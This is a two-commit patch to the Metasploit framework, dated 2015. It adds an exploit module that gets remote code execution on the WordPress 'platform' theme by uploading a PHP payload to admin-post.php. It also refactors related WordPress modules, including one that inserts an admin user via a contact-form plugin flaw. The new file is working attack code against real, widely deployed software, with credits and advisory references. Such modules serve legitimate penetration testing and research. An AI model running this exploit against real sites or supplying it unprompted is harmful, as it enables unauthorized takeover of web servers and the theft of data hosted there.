From 2c956c0a0f66e5dc7f95daaed01022dc320b68fa Mon Sep 17 00:00:00 2001
From: Christian Mehlmauer <firefart@gmail.com>
Date: Sat, 31 Jan 2015 22:02:44 +0100
Subject: [PATCH 1/2] add wordpress platform theme rce

---
 lib/msf/http/wordpress/uris.rb                | 10 +++-
 .../admin/http/wp_custom_contact_forms.rb     |  5 +-
 .../exploits/unix/webapp/wp_platform_exec.rb  | 58 +++++++++++++++++++
 .../webapp/wp_wysija_newsletters_upload.rb    |  4 +-
 4 files changed, 70 insertions(+), 7 deletions(-)
 create mode 100644 modules/exploits/unix/webapp/wp_platform_exec.rb

diff --git a/lib/msf/http/wordpress/uris.rb b/lib/msf/http/wordpress/uris.rb
index cd7b3cc166..cad39afb50 100644
--- a/lib/msf/http/wordpress/uris.rb
+++ b/lib/msf/http/wordpress/uris.rb
@@ -77,9 +77,17 @@ module Msf::HTTP::Wordpress::URIs
   #
   # @return [String] Wordpress Admin Ajax URL
   def wordpress_url_admin_ajax
-    normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php')
+    normalize_uri(wordpress_url_backend, 'admin-ajax.php')
   end
 
+  # Returns the Wordpress Admin Posts URL
+  #
+  # @return [String] Wordpress Admin Post URL
+  def wordpress_url_admin_post
+    normalize_uri(wordpress_url_backend, 'admin-post.php')
+  end
+
+
   # Returns the Wordpress wp-content dir URL
   #
   # @return [String] Wordpress wp-content dir URL
diff --git a/modules/auxiliary/admin/http/wp_custom_contact_forms.rb b/modules/auxiliary/admin/http/wp_custom_contact_forms.rb
index 00693ad9f7..75bf278687 100644
--- a/modules/auxiliary/admin/http/wp_custom_contact_forms.rb
+++ b/modules/auxiliary/admin/http/wp_custom_contact_forms.rb
@@ -43,7 +43,7 @@ class Metasploit3 < Msf::Auxiliary
 
   def get_table_prefix
     res = send_request_cgi({
-      'uri'       => normalize_uri(wordpress_url_backend, 'admin-post.php'),
+      'uri'       => wordpress_url_admin_post,
       'method'    => 'POST',
       'vars_post' => {
         'ccf_export' => "1"
@@ -81,10 +81,9 @@ class Metasploit3 < Msf::Auxiliary
     post_data = data.to_s
 
     print_status("#{peer} - Inserting user #{username} with password #{password}")
-    uri = normalize_uri(wordpress_url_backend, 'admin-post.php')
     res = send_request_cgi(
       'method'   => 'POST',
-      'uri'      => uri,
+      'uri'      => wordpress_url_admin_post,
       'ctype'    => "multipart/form-data; boundary=#{data.bound}",
       'data'     => post_data
     )
diff --git a/modules/exploits/unix/webapp/wp_platform_exec.rb b/modules/exploits/unix/webapp/wp_platform_exec.rb
new file mode 100644
index 0000000000..bb5269e758
--- /dev/null
+++ b/modules/exploits/unix/webapp/wp_platform_exec.rb
@@ -0,0 +1,58 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::HTTP::Wordpress
+
+  def initialize(info = {})
+    super(update_info(
+      info,
+      'Name'           => 'Remote Code Execution in Wordpress Platform Theme',
+      'Description'    => %q{
+          The Wordpress Theme "platform" contains a remote code execution vulnerability
+          through an unchecked admin_init call. The theme includes the uploaded file
+          from it's temp filename with php's include function.
+      },
+      'Author'         =>
+        [
+          'Marc-Alexandre Montpas', # initial discovery
+          'Christian Mehlmauer'     # metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          ['URL', 'http://blog.sucuri.net/2015/01/security-advisory-vulnerabilities-in-pagelinesplatform-theme-for-wordpress.html'],
+          ['WPVDB', '7762']
+        ],
+      'Privileged'     => false,
+      'Platform'       => ['php'],
+      'Arch'           => ARCH_PHP,
+      'Targets'        => [['platform < 1.4.4, platform pro < 1.6.2', {}]],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Jan 21 2015'))
+  end
+
+  def exploit
+    filename = "Settings_#{rand_text_alpha(5)}.php"
+
+    data = Rex::MIME::Message.new
+    data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"file\"; filename=\"#{filename}\"")
+    data.add_part('settings', nil, nil, 'form-data; name="settings_upload"')
+    data.add_part('pagelines', nil, nil, 'form-data; name="page"')
+    post_data = data.to_s
+
+    print_status("#{peer} - Uploading payload")
+    res = send_request_cgi(
+      'method'   => 'POST',
+      'uri'      => wordpress_url_admin_post,
+      'ctype'    => "multipart/form-data; boundary=#{data.bound}",
+      'data'     => post_data
+    )
+  end
+end
diff --git a/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb b/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb
index 7957fbfc46..3a66c6920b 100644
--- a/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb
+++ b/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb
@@ -78,8 +78,6 @@ class Metasploit3 < Msf::Exploit::Remote
 
     zip_content = create_zip_file(theme_name, payload_name)
 
-    uri = normalize_uri(wordpress_url_backend, 'admin-post.php')
-
     data = Rex::MIME::Message.new
     data.add_part(zip_content, 'application/x-zip-compressed', 'binary', "form-data; name=\"my-theme\"; filename=\"#{rand_text_alpha(5)}.zip\"")
     data.add_part('on', nil, nil, 'form-data; name="overwriteexistingtheme"')
@@ -94,7 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote
     print_status("#{peer} - Uploading payload to #{payload_uri}")
     res = send_request_cgi(
       'method'   => 'POST',
-      'uri'      => uri,
+      'uri'      => wordpress_url_admin_post,
       'ctype'    => "multipart/form-data; boundary=#{data.bound}",
       'vars_get' => { 'page' => 'wysija_campaigns', 'action' => 'themes' },
       'data'     => post_data

From 28f303d43116cd3546417df62b887d75563aba14 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Tue, 3 Feb 2015 17:33:29 -0600
Subject: [PATCH 2/2] Decrease timeout

---
 modules/exploits/unix/webapp/wp_platform_exec.rb | 10 +++++-----
 1 file changed, 5 insertions(+), 5 deletions(-)

diff --git a/modules/exploits/unix/webapp/wp_platform_exec.rb b/modules/exploits/unix/webapp/wp_platform_exec.rb
index bb5269e758..29143dd3f4 100644
--- a/modules/exploits/unix/webapp/wp_platform_exec.rb
+++ b/modules/exploits/unix/webapp/wp_platform_exec.rb
@@ -15,9 +15,9 @@ class Metasploit3 < Msf::Exploit::Remote
       info,
       'Name'           => 'Remote Code Execution in Wordpress Platform Theme',
       'Description'    => %q{
-          The Wordpress Theme "platform" contains a remote code execution vulnerability
-          through an unchecked admin_init call. The theme includes the uploaded file
-          from it's temp filename with php's include function.
+        The Wordpress Theme "platform" contains a remote code execution vulnerability
+        through an unchecked admin_init call. The theme includes the uploaded file
+        from it's temp filename with php's include function.
       },
       'Author'         =>
         [
@@ -48,11 +48,11 @@ class Metasploit3 < Msf::Exploit::Remote
     post_data = data.to_s
 
     print_status("#{peer} - Uploading payload")
-    res = send_request_cgi(
+    send_request_cgi({
       'method'   => 'POST',
       'uri'      => wordpress_url_admin_post,
       'ctype'    => "multipart/form-data; boundary=#{data.bound}",
       'data'     => post_data
-    )
+    }, 5)
   end
 end